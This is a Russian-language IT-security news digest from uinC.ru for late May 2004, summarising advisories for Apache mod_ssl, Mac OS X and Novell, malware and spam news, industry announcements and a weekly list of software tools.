Известный китайский исследователь компьютерной безопасности Лю Ди Ю, обнаруживший много дыр в браузере Internet Explorer (и не только в нём) создал в Интернете сайт, который содержит архив обнаруженных уязвимостей в основных составляющих ОС Windows: Internet Explorer, Outlook, Windows Media Player, JVM (виртуальная машина Java). Архив ведётся с 200 года. Помимо этого, при помощи специального PHP-скрипта 3 раза в день производится текущее обновление сайта на основании анализа сообщений списков рассылки (сайтов): BugTraq, fulldisclosure, Microsoft.
iebug.com/

27/05/2004 20:13 Microsoft укрепляет защиту базы данных
Во вторник компания объявила, что в ее СУБД SQL Server 2005 с кодовым названием Yukon войдут средства шифрования, затрудняющие доступ к информации для хакеров и других не наделенных соответствующими правами пользователей. Microsoft уже предлагает инструменты шифрования данных, передаваемых по сети между SQL Server и клиентскими приложениями. В новой версии SQL Server, которую компания планирует выпустить в начале 2005 года, будут шифроваться и данные, хранящиеся в самой БД, что сделает ее намного более устойчивой к атакам, говорит продакт-менеджер Microsoft Кристен Уорд. В начале этого года Microsoft перенесла выпуск SQL Server 2005 на первое полугодие следующего года. Новая версия должна обеспечить вычислительные возможности, позволяющие СУБД лучше конкурировать с продуктами Oracle и IBM. Кроме того, в нее войдет новая концепция унифицированной системы хранения данных, которая облегчит поиск и извлечение информации. Кроме этого, Microsoft выпустит программное обеспечение Best Practices Analyzer Tool, которое администраторы баз данных смогут использовать для точной настройки своих БД с применением опыта, накопленного Microsoft. Этот инструмент, который будет работать и с текущей версией СУБД Microsoft SQL Server 2000, обеспечит администраторов рекомендациями по разным вопросам, таким как способы повышения производительности и повышение эффективности резервного копирования данных.
Подробности

28/05/2004 13:06 Появился первый 64-битный вирус
Секьюрити-компания Symantec сообщила в четверг о том, что обнаружена первая угроза для 64-bit Windows систем - вирус, получивший название W64.Rugrat.3344. Представитель Cupertino, сказал, что это не совсем вирус, а скорее червь, разработанный кем-то, чтобы показать наличие уязвимостей с данном типе систем. Однако, представители Symantec заявили, что W64.Rugrat.3344 может успешно атаковать 64-bit файлы Microsoft Windows. Вирус не инфицирует 32-битные файлы и не работает на 32-битных Windows системах. Поскольку 64-битные системы только начинают распространяться, Symantec считает, что этот вирус не представляет большой опасности. W64.Rugrat.3344 написан на ассемблере для IA64 (Intel Architecture) и инфицирует IA64 исполняемые файлы, исключая dll, находящиеся в той же папке что и вирус.
CNET News.com

28/05/2004 13:24 Yahoo добавила Anti-Spyware в свой тулбар
Yahoo добавила новую функцию в свой тулбар, которая будет позволять пользователям обнаруживать шпионские программы на PC. Yahoo сообщила, что их "Anti-Spy beta" - так называется бета версия нового сервиса - чрезвычайно прост в использовании и поможет пользователям при работе "онлайн". Новый сервис базируется на программном обеспечении Pest Patrol. Теперь Yahoo Toolbar, в дополнение к уже имеющимся функциям интернет поиска, блокировки pop-up окон и управления закладками, будет содержать и анти-шпионскую функциональность. Yahoo Toolbar доступен для скачивания здесь.
Источники: theinquirer.net, reuters.com

28/05/2004 14:13 Новая версия Maс OS X 10.3.4 содержит старые дыры
Продолжается эпопея URI-уязвимостей в Maс OS. Вчера секьюрити-компания Secunia обновила Advisory #SA11689 (http://secunia.com/advisories/11689), тип которой "чрезвычайно критичный". Дело в том, что, как оказалось, новая, только что выпущенная версия Maс OS X 10.3.4 содержит все те же дыры, о которых сообщается в Advisory. Напомним, что в Maс OS уязвим обработчик URI, уязвимости обнаруживаются при обработке "help", "disk", "ftp", "ssh" URI команд. В различной конфигурации уязвимости позволяют от незаметной загрузки и запуска вредоносного кода на уязвимой машине до открытия прямого соединения к удаленной машине и проброски портов. По-видимому это внутренняя проблема всей структуры обработчика URI в Maс OS. Возможно, что и другие обработчики, кроме перечисленных, также уязвимы различными способами, говорится в Advisory. Ожидается, что не только браузеры, но и другие программы, использующие URI handler, также могут быть уязвимы. Apple выпускала патч закрывающий "help" URI уязвимость. Остальные уязвимости подтверждены на полностью пропатченной Mac OS X 10.3.3 и, как оказалось, на новой Maс OS X 10.3.4.
SearchSecurity.com

28/05/2004 14:30 Переполнение буфера в Apache mod_ssl
Secunia сообщает об обнаруженной уязвимости в Apache mod_ssl, позволяющей провести DoS атаку. Уязвимость присутствует благодаля ошибке в функции ssl_util_uuencode_binary(), обрабатывающей клиентские сертификаты. Неправильная проверка ограничений приводит к возможности переполнения буфера на стеке при обработке специально созданного сертификата, содержащего очень длинный загодовок DN, более 6KB. Успешное использование уязвимости требует включенной опции "FakeBasicAuth" и клиентского сертификата от доверенного CA. Тип уязвимости - "Moderately critical". Уязвимы Apache 2.0.x, Apache 1.3.x с mod_ssl 2.x.
Secunia Advisory

28/05/2004 14:39 OpenSSL уязвимость в Novell iManager и eDirectory
Novell подтвердила наличие множества OpenSSL уязвимостей в Novell iManager и eDirectory, которые позволяют удаленному пользователю провести DoS атаку. Уязвимы Novell eDirectory 8.x, Novell iManager 1.5.x и Novell iManager 2.0.x. Тип уязвимости - "Highly critical". Подробнее о уязвимостях можно узнать в Secunia Advisory: SA11728, SA9886, SA11139.
Оригинальное описание уязвимости от Novell, Патч.

28/05/2004 16:14 Американского спамера посадили на семь лет
Житель штата Нью-Йорк, отославший 825 миллионов спам-сообщений, приговорен судом штата к семи годам тюрьмы за свою деятельность, сообщает агентство Reuters. В апреле суд признал Говарда Кармака (Howard Carmack), известного как "Спамер из Баффало", виновным по всем 14 предъявленым обвинениям, среди которых такие как "незаконное получение идентификационных данных" и "мошенничество". Для рассылки спама мошенник использовал чужие почтовые акккаунты и фальшивые адреса. В прошлом году интернет-провайдер EarthLink Inc. выиграл у Кармака иск на сумму в 16,5 миллионов долларов. Показания работников EarthLink использовались против спамера в суде. Впрочем, у Кармака есть шанс выйти из тюрьмы досрочно. В случае, если в заключении он будет отличаться примерным поведением, срок сократят до трех с половиной лет.
lenta.ru

29/05/2004 10:59 Калифорнийские сенаторы помешают Google читать чужую почту
Сенат штата Калифорния потребовал от компании Google ограничить функции новой почтовой службы Gmail, которая начала работать с апреля этого года. Недовольство законодателей вызвало намерение Google отслеживать содержание писем, чтобы вставлять в них соответствующую теме сообщений рекламу, сообщается на сайте BBC News. В связи с появлением нового сервиса сенатор Лиз Фигуэро (Liz Figueroa) предложила законопроект, который должен гарантировать тайну переписки. Он позволяет Google отслеживать почтовые сообщения в режиме реального времени, однако запрещает создавать архивы результатов такого мониторинга. Кроме того, проект закона должен помешать Google собирать личную информацию о пользователях и продавать ее другим компаниям. За счет мониторинга содержания писем и размещения соответствующей рекламы Google рассчитывает компенсировать расходы на предоставление почтового ящика размером в 1 гигабайт. При этом компания обещает, что ее сотрудники не будут читать сообщения - анализом содержания займется компьютер. Руководство Google заявило, что участвует в работе над законопроектом и намерено гарантировать своим клиентам тайну переписки. После голосования в законодательном собрании Калифорнии закон будет направлен на утверждение губернатору штата Арнольду Шварценеггеру, который вправе отменить ограничения.
Источник

29/05/2004 11:32 AOL выпустит новую версию Netscape
В четверг компания America Online сообщила, что летом выйдет новая версия веб-браузера Netscape, хотя не похоже, чтобы компания возвращалась к серьезной работе над браузером. Представительница AOL сказала, что новое ПО будет основано на коде Mozilla 1.7, разработанном open source-отделением Netscape. По ее словам, это незначительный апгрейд, в который войдут несколько секьюрити-патчей, но интерфейс останется в основном неизменным. «Гигантским шагом вперед это не назовешь», — признала она. Netscape 7.2 выходит на фоне слухов о том, что AOL едва ли не прекратила работу над браузером после прошлогодних сокращений, затронувших 500 сотрудников компании в Калифорнии, включая большинство членов команды, работающей над Netscape. Некоторых программистов AOL перевела в другие офисы, в том числе в новый исследовательский центр в Бангалоре (Индия). Сокращения последовали за решением по антимонопольному иску родительской компании Time Warner против Microsoft, которое принесло медиагиганту $750 млн и в числе прочего семилетний контракт на использование в службе AOL браузера Microsoft Internet Explorer. Предыдущее обновление Netscape вышло в июле прошлого года и добавило поддержку неанглийских имен доменов, а также фильтр спама на базе байесова анализа входящей почты.
Подробности

29/05/2004 12:05 Microsoft представила русскую версию Visual Basic .NET 2003
В Москве прошла презентация впервые выпущенной русской версии стандартной редакции среды разработки Microsoft Visual Basic .NET 2003, а также состоялись подведение итогов и награждение победителей конкурса разработчиков, приуроченных к этому событию. В презентации приняли участие Патрик Желле, директор группы локализации средств разработки корпорации Microsoft, Алексей Чубарь, директор департамента стратегических технологий представительства Microsoft в России и СНГ, представители партнеров Microsoft. Новая версия Microsoft Visual Basic .NET позволяет решать многие проблемы, связанные с разработкой настольных и веб-приложений. В частности, в ней реализован механизм автоматического развертывания, позволяющий избежать конфликтов между разными версиями совместно используемых динамических библиотек (DLL). Благодаря поддержке объектов ADO.NET разработчики могут использовать мощные классы и компоненты для создания встраиваемых в приложения гибких сценариев работы с данными. В состав Visual Basic .NET также входит специальный мастер, позволяющий модернизировать написанный ранее код приложений Visual Basic 6.0 для работы в среде Visual Basic .NET. Кроме того, допускается использование отдельных компонентов Visual Basic в приложениях Visual Basic .NET 2003.
Источник

29/05/2004 12:49 Macromedia выпустила Flash Player 7 для Linux
Macromedia завершила свой недельний цикл, обновив мультимедийный Flash-плейер для Linux-систем.
Уже доступный для платформы Windows и Macintosh, Macromedia Flash Player 7 теперь есть и для Linux: он может быть скачан с сайта Macromedia и будет включен в будущие Linux-системы от Novell, Red Hat, Sun Microsystems и Turbolinux. «Мы хотели убедиться в том, что Flash Player 7 для Linux будет соотвествовать производительным стандартам, присущим нашим другим версиям», — прояснил ситуацию Waleed Anbar, менеджер продуктов Macromedia.
nixp.ru

29/05/2004 13:11 iScala UI Designer облегчает разработку интерфейса для Microsoft CRM
Компания Scala Business Solutions продемонстрировала новый продукт iScala User Interface (UI) Designer - связанный с Microsoft .NET инструментарий, позволяющий пользователям легко настраивать и создавать новые экраны для доступа к Microsoft CRM. С помощью iScala UI Designer можно намного быстрее настраивать экраны в Microsoft CRM и вносить более глубокие изменения, не используя при этом никаких инструментальных средств Microsoft Visual Studio, кроме встроенного проектировщика форм Form Designer. ПО iScala UI Designer, ориентированное на технических или бизнес-консультантов, позволяет партнерам создавать специализированные решения, которые можно легко интегрировать с будущими версиями. Кроме того, оно включает в себя средства локализации пользовательских интерфейсов на различных языках, включая кириллицу, языки с написанием справа налево и языки с двухбайтовыми символами.
О компании

29/05/2004 13:44 Инфраструктура интернета дает сбои
Из-за проблемы в системе кэш-серверов Akamai 24 мая с 15:00 до 16:30 МСК многие высокопосещаемые веб-сайты замедлили свою работу, а некоторые вообще оказались недоступны. В течение полутора часов многие посетители eBay, Yahoo! и MSNBC вместо загрузки страницы видели сообщение об ошибке. Значительно ухудшилась поставка обновлений антивирусных баз пользователям программных продуктов Symantec, McAfee и TrendMicro, а также мультимедийного контента с сайта Apple. По результатам мониторинга Netcraft, серьезные проблемы с производительностью испытывали серверы BellSouth, General Motors, Coca Cola и Verizon. На сайте Akamai 24 мая в разделе для клиентов было опубликовано специальное заявление, в котором сообщается, что компания «осведомлена о сбое в работе сервиса этим утром, что повлияло на доставку контента. Мы нашли и устранили источник проблемы. Теперь трудности с доставкой контента уменьшатся или исчезнут». Судя по всему, проблема была технической, а не связана с DoS-атакой на сеть серверов по доставке контента (CDN), о которой сразу же появились слухи. Масштаб инфраструктуры Akamai, в которую входят от 12 тыс. до 15 тыс. серверов, делает возможность такой атаки практически нереальной. CDN-серверы Akamai помогают управлять трафиком на самых посещаемых сайтах интернета, кэшируя их содержимое и перераспределяя информационные потоки внутри глобальной сети. CDN-серверы используются также для отражения DoS-атак. Только благодаря инфраструктуре Akamai сайт Microsoft непрерывно держится в онлайне начиная с августа 2003 года, когда на него началась перманентная атака со стороны машин, инфицированных червем Blaster. В августе 2003 года Microsoft изменила собственные DNS-настройки так, что все запросы по адресу www.microsoft.com обрабатываются не машинами корпорации, а службой кэширования Akamai. Поскольку сеть Akamai является своеобразным «хребтом» системы распространения коммерческого контента в интернете, то она давно привлекает внимание хакеров. В частности, хакерская группа «Пушистый кролик» (Fluffi Bunny) заявляла, что ей удалось скопировать некоторые файлы во время вторжения в сеть в апреле 2001 г. По некоторой информации, хакерская группа собиралась использовать тысячи серверов Akamai для распределенной атаки на серверы системы DNS. В ответ на это Akamai заявила, что сеть надежно защищена и ее невозможно использовать таким образом. Предполагаемый лидер хакерской группы «Пушистый кролик» был арестован в прошлом году на специализированной выставке по компьютерной безопасности InfoSecurity Europe 2003 в Лондоне.
Вебпланета

29/05/2004 14:19 Южная Корея нашла в разведке КНДР хакерское подразделение
В спецслужбах КНДР действует элитное подразделение, занимающееся взломом компьютерных сетей Республики Корея. С таким заявлением выступил южнокорейский генерал Сон Йон Кюн на конференции в Сеуле, сообщает агентство Yonhap. По словам Сон Йюн Кюна, распоряжение о проведении кибертеррора против Республики Корея издано лично северокорейским лидером - Ким Чен Иром. «Следуя приказам Ким Чен Ира, Северная Корея учредила хакерское подразделение», - заявил Сон Йюн Кюн. Конференция, в ходе которой генерал рассказал о киберопасности КНДР, была организована корейским Агентством в области безопасности информации при Министерстве информации и коммуникаций. Участники конференции обсуждали вопросы безопасности в области разведки. Южнокорейский генерал убежден, что хакеры правительства КНДР неоднократно вторгались в сети властных структур Республики Корея и похищали секретную информацию. Заявления Сон Йон Кюна прозвучали на следующий день после того, как представители военных ведомств двух корейских государств обсудили предложения по снижению напряженности на межкорейской границе. В составе хакерского подразделения КНДР проходят службу выпускники военной академии имени Ким Ир Сена, занимающейся подготовкой кадров для военной разведки. Помимо хакерских задач элитное подразделение занимается пропагандой в интернете. Сон Йон Кюн упомянул 8 пхеньянских и 26 пропхеньянских сайтов, распространяющих в Сети идеи Чучхе. «Для противостояния растущему числу киберугроз со стороны КНДР необходимы комбинированные усилия», - считает южнокорейский генерал. Военная академия имени Ким Ир Сена ежегодно выпускает около 100 специалистов в сфере компьютерных технологий.
Источник

29/05/2004 14:36 ПО китайских разработчиков угрожает MS Office?
Недавно созданная пекинская компания Evermore Software выпустила в продажу альтернативу пакету Microsoft Office на рынках Китая, Японии и США. Пакет под названием EIOffice 2004, написанный на Java, работает как в системе Linux, так и в ОС Windows. Система включает в себя текстовый процессор, программу для работы с электронными таблицами и приложение для создания графиков и диаграмм, причём всё это работает в едином интерфейсе. Пакет также включает возможность импорта и экспорта файлов в форматах .DOC, .XLS, и .PPT. В отличие от MS Office, EIOffice использует единый формат файлов для всех документов и способен сохранять множество документов в одном файле для того, чтобы упростить связывание файлов, использующихся в рамках одного проекта. Китайская, английская и японская версии EIOffice 2004 уже доступны и распространяются по полуподписной схеме, вместо единовременной оплаты продукта. Подписка на 5 лет, включающая также обновление и техподдержку, обойдётся в $400, а на один год – всего в $150. Последняя цена полностью совпадает с таковой на редакции для студентов и преподавателей Students and Teacher пакета Microsoft Office.
CNEWS

29/05/2004 20:10 В Канаде задержали молодого вирусописателя
Канадская полиция арестовала 16-летнего подростка, подозреваемого в авторстве интернет-червя Randex, хорошо известного любителям IRC и пиринговых сетей. По информации ZDNet UK, полиция напала на след юного натуралиста благодаря наводке некоего Тони Койвунена (Toni Koivunen), занимающегося на досуге проблемами компьютерной безопасности. Тони разыскивал автора Randex'a в течение нескольких месяцев и, предположительно, напал на его след уже в феврале этого года. По всей видимости, канадской полиции потребовалось почти три месяца на то, чтобы накопить доказательную базу, достаточную для предъявления обвинения. Randex является примитивным интернет-червем, изначально распространявшимся по каналам IRC и пиринговым сетям. Захваченные с помощью червя компьютеры превращались в спамерские зомби-машины, контролируемые посредством встроенного IRC-клиента.
Источник

30/05/2004 10:07 Обновление книги TCP/IP Illustrated
Книга Ричарда Стивенса "TCP/IP Illustrated" (издательство Прентисс-Холл) - вещь культовая. Тем не менее, некоторая часть информации в ней на сегодняшний день несколько устарела, другая - потеряла свою актуальность. Профессор из университета г. Bath (Великобритания) J.H. Davenport сделал дополнения к книге Стивенса, в которых как раз обсуждаются все неактуальные на сегодняшний день пункты и дается дополнительная информация, которая была бы полезна сегодня, но которая отсутствует в книге.
HTML-формат
PDF-формат

30/05/2004 10:44 Украинские интернет-провайдеры: Спамеров нужно «мочить»
Украинские интернет-провайдеры обсудили методы борьбы с не заказанными рекламными сообщениями (спамом). «Круглый стол», посвященный борьбе со спамом, состоялся в рамках конференции по вопросам развития интернет в Украине, которая проходит в Судаке. По мнению ряда участников обсуждения, в Украине необходимо ввести законодательное ограничение спама. В то же время некоторые провайдеры отметили недостаточность этих мер, считая, что существующая в Украине законодательная база позволяет уже сейчас привлекать спамеров к ответственности, а несколько показательных процессов будут способствовать существенному уменьшению спама в стране. Наибольшие нарекания со стороны интернет-провайдеров вызвала деятельность так называемого «Национального бизнес центра». Они считают, что именно к этой организации необходимо в первую очередь применить предусмотренные законодательством меры. Участники «круглого стола» обсудили также возможность технической фильтрации спама, необходимость создания «черного списка» адресов, с которых он распространяется. В то же время отмечалось, что использование такого фильтра приведет к задержке не только спама, но и необходимых сообщений, сообщают «Подробности». Провайдеры решили продолжить работу по противодействию спаму в рамках комитета Интернет-ассоциации Украины (ИнАУ) по вопросам безопасности и предупреждения правонарушений в информационных системах.
forUm

30/05/2004 12:19 Тенденции развития вредоносных программ, май 2004
Вирусный аналитик «Лаборатории Касперского» Алиса Шевченко на сайте viruslist.ru опубликовала обзор, в котором рассматривваются основные тенденции развития вредоносных программ, наблюдающиеся в мае текущего года. В отличие от начала весны, ознаменованного эпидемиями однотипных и эксплуатирующих, в основном, «человеческий фактор» почтовых червей I-Worm.Mydoom, I-Worm.NetSky и I-Worm.Bagle, май отмечен появлением большого количества вредоносных программ, распространяющихся через технические уязвимости, а не социальные факторы. Важнейшие события ушедшего месяца - одна свежая, но уже активно используемая вирусописателями уязвимость и сразу две принципиально новых разновидности вредоносных программ. Войны почтовых (I-Worm) червей поутихли, вирусописатели сконцентрировались на новых возможностях, и очень быстро в интернете появился внушительный набор вредоносных программ, распространяющихся через вышеупомянутую уязвимость. Отдельного внимания заслуживают две из них, получившие значительное распространение к концу мая: TrojanProxy.Win32.Bobax («троянец»-прокси, в котором функция размножения вызывается по команде извне) и Worm.Win32.Padobot (червь с функцией «бэкдора»). Безоговорочным «хитом» списка майских вирусных новинок можно считать Win64.Rugrat.a - первый вирус, родной средой обитания которого является Windows для 64-битной платформы Intel, IA64. Этот по большей части концептуальный (вследствие малой распространенности и узкой на сегодняшний день области применения данной 64-битной архитектуры) вирус - потомок Win32.Chiton, впервые обнаруженного 2 года назад. В связи с особенностями архитектуры IA64 написание вирусов для нее - более сложная задача, чем в случае с привычной нам архитектурой x86.
Обзор

30/05/2004 12:43 Бета-тестирование Антивируса Касперского® 5.0 для Sendmail с Milter API
"Лаборатория Касперского" сообщает о начале бета-тестирования Антивируса Касперского® 5.0 для Sendmail с Milter API. Необходимо отметить уникальность данной разработки. В продуктовой линейке "Лаборатории Касперского" впервые появится продукт, созданный специально для антивирусной защиты почтовой системы Sendmail с поддержкой технологии Milter API. Антивирус Касперского для Sendmail с Milter API предназначен для обеспечения антивирусной безопасности почтового трафика LinuxUnix-сервера. Продукт функционирует совместно с почтовой системой Sendmail, поддерживающей Sendmail"s Content Management (Milter) API. Milter API - интерфейс, предоставляющий внешним программным приложениям доступ к почтовым сообщениям, обрабатываемым Sendmail. Тем самым он позволяет осуществлять дополнительную обработку и редактирование содержимого и мета-данных почтового сообщения. Анализ входящего и исходящего почтового трафика обеспечивает надежный контроль над источниками проникновения вредоносных кодов. В случае необходимости, программный комплекс быстро и надежно нейтрализует вирус, полностью исключая его дальнейшее распространение.
Условия бета-тестирования

30/05/2004 13:26 И все-таки Lindows останется Lindows
Голландский суд, стараниями которого операционная система Lindows превратилась в Lin---s, а потом – в Linspire, все-таки разрешил американской компании использовать торговую марку Lindows в качестве своего имени. Очередной виток судебных разбирательств начался после того, как компания, покорно сменившая название своей операционной системы Lindows на оппортунистический вариант Linspire и установила редирект на сайт linspire.com, подверглась новым нападкам со стороны адвокатов Microsoft. Редмонский левиафан, почуявший запах крови и страха, попытался добить крохотного конкурента в его норке. По мнению Microsoft, использование слова «Lindows» в качестве названия компании наносило ущерб принадлежащей Microsoft торговой марке Windows. Тем не менее, сообщает PC World, на этот раз машина сутяжничества дала сбой: вынося решение, голландский судья принял во внимание тот факт, что Lindows уже фактически на является торговой маркой, а используется только в документации к операционной системе Linspire. Кроме того, компания вполне четко указывает, что Lindows не имеет никакого отношения к Microsoft.
internet.ru

30/05/2004 13:49 Вышло обновление ОС КПК Toshiba e800/e805
Для владельцев КПК Toshiba. Европейское подразделение компании Toshiba опубликовало обновление операционной системы КПК Toshiba e800/e805 до версии Windows Mobile 2003 SE, cообщает mobile-review.com. Для данного – первого на рынке VGA PocketPC КПК текущее обновление ОС было особо ожидаемым.
Скачать обновление

30/05/2004 20:35 Проблемы в Fedora Core 2
Cогласно сообщениям на многих новостных порталах, в Fedora Core 2 обнаружена довольно серьёзная проблема, связанная с невозможностью загрузки нескольких ОС. В частности, после установки GRUB (загрузчик, пришедший на смену традиционному LILO) отмечена невозможность загрузки ОС Windows XP/2K/2003. Cудя по всему, проблема скрывается в несогласованности информации о конфигурации жёсткого диска в BIOS и в ядре Linux. Честно говоря, не совсем понятна позиция разработчиков из доблестной Red Hat, поскольку проблема была замечена ещё в феврале текущего года и нашла отражение в репозитарии ошибок (bugzilla). Отрадно, что описание решения проблемы тоже уже опубликовано Jack Aboutboul. Для устранения этого "бага" достаточно применить утилиту sfdisk. Подобная проблема совершенно не на руку разработчикам из Red Hat, которую после выпуска первой "Федоры" всё чаще упрекают в "попсовости" в мире Linux.
Обсуждение проблемы
Методы её решения

30/05/2004 20:53 ServerSide.com блокирует JBoss
Несколько недель назад компания JBoss, продвигающая одноименной открытый сервер приложений, и ее руководитель Марк Флери (Marc Fleury) подверглась резкой критики из-за попытки дискредитировать продукцию конкурентов путем отправки ложных сообщений на популярные web-сайты, в частности, JavaLobby и TheServerSide.com. Сообщения отправлялись анонимно или же с использованием ничего не значащих имен, однако, IP-адрес, с которого это было сделано, принадлежал JBoss Inc. Вчера компания Middleware Company, владеющая TheServerSide.com, объявила о разрыве отношений с JBoss. "Мы пытались решить эту проблему дипломатическим путем, ... однако, нестабильность и непрофессиональное поведение JBoss и ее президента Марка Флери разрушили наш оптимизм в достижении соглашения. Мы извиняемся за неудобства, причиненные JBoss Inc",-говорится в заявлении компании. "Лично мне не нужна маска для того, чтобы высказать свое мнение и одна из вещей, которые я не переношу - это двуличность",-ответил Марк Флери.
LinuxCenter.ru



Программы дня за прошедшую неделю:

24/05/2004 Dongle Signatures for IDA
Набор сигнатур функций электронных ключей для дизассемблера IDA.
Содержит:
+ Hardlock
+ Hasp
+ Keylok
+ Sentinel
+ Sentinel SuperPro
+ Wibu
ОС: All Win
Тип программы: Реверсинг

25/05/2004 Inno Setup
Программа представляет собой многофункциональный инструмент для создания (ЕХЕ) файлов инсталляции с многоязыковой поддержкой. Программа обладает встроенным мастером для создания файлов инсталляций, с помощью которого вы можете настроить множество различных наиболее используемых параметров. Кроме этого, Inno Setup позволяет определить заданные записи в файлах системного реестра и инициализации, выбрать, будет ли программа автоматически загружаться с запуском операционной системы и добавлять свою пиктограмму в меню "Пуск", а также оснащает каждый дистрибутив системой корректного удаления из системы, существует возможность создания многотомных файлов инсталляций с заданным максимальным размером каждого. Для продвинутых пользователей существует поддержка использования скриптов, написанных на Pascal. На сайте программы доступны ее исходные коды на языке программирования Borland Delphi.
ОС: All Win
Тип программы: Программирование

26/05/2004 Cheops-NG
Cheops представляет собой ПО с открытым исходным текстом, основной назначение которого - мониторинг и вывод в реальном времени состояния администрируемой (или контролируемой) сети. Написан с использованием GIMP Tool Kit, GTK+, также включена поддержка Gnome. Изначально был разработан студентом Марком Спенсером для ОС Linux, однако портирован и на другие ОС. Позволяет в реальном масштабе времени наблюдать за состоянием сети, при этом выводит к каждому хосту кучу нужной информации: IP, запущенные сетевые сервисы, тип ОС (определение построено на основании алгоритма, разработанного в довольно известном сканере Queso). Распространяется на условиях GPL.
ОС: Unix
Тип программы: Мониторинг сети

28/05/2004 Karen's Replicator
Программа обеспечивает резервное копирование файлов.
+ интервалы копирования от нескольких минут до нескольких месяцев;
+ можно указать дни (например выходные) когда копировать не нужно;
+ поддерживает файлы более 2ГБ
ОС: All Win
Тип программы: Резервное копирование

29/05/2004 Firewall Monitor (fwmon)
Монитор, предназначенный для анализа в реальном времени событий (вторжений, атак и т.д.) встроенного файрволла Linux - ipchains/Iptables. Может быть запущен в chroot-среде для повышения безопасности. Позволяет также связать выводимый формат с SQL-базами данных (MsSQL, например). Текущая версия 1.1.0. Распространяется на условиях GPL версии 2. Доступен в в виде исходников, в виде SRPM и RPM-пакетов.
ОС: Unix
Тип программы: Firewall

30/05/2004 Bootable CD Wizard
Менеджер загрузки с компакт-дисков. Позволяет создавать мульти-загрузочные (Multiple-Image Bootable CD) CD для компьютеров, которые не поддерживают мульти-загрузку с CD-драйва. Позволяет создавать мульти-язычное, иерархическое меню загрузки с настраиваемым внешним видом. Поддерживает расширенный набор форматов загрузочных образов. Если хорошо постараться получается мощное аварийное средство со всем необходимым софтом.
ОС: All Win
Тип программы: Дисковые утилиты


Архив рассылки новостей:
http://uinc.ru/news/archive/


На этом пока все.
Всем удачи.
uinC Team
http://uinc.ru

P.S. Все предложения, замечания и просьбы оставлять здесь:
http://uinc.ru/news/sendnews.php

Любые материалы с нашего сайта или рассылки не могут быть скопированы без разрешения автора или администрации сервера uinC.ru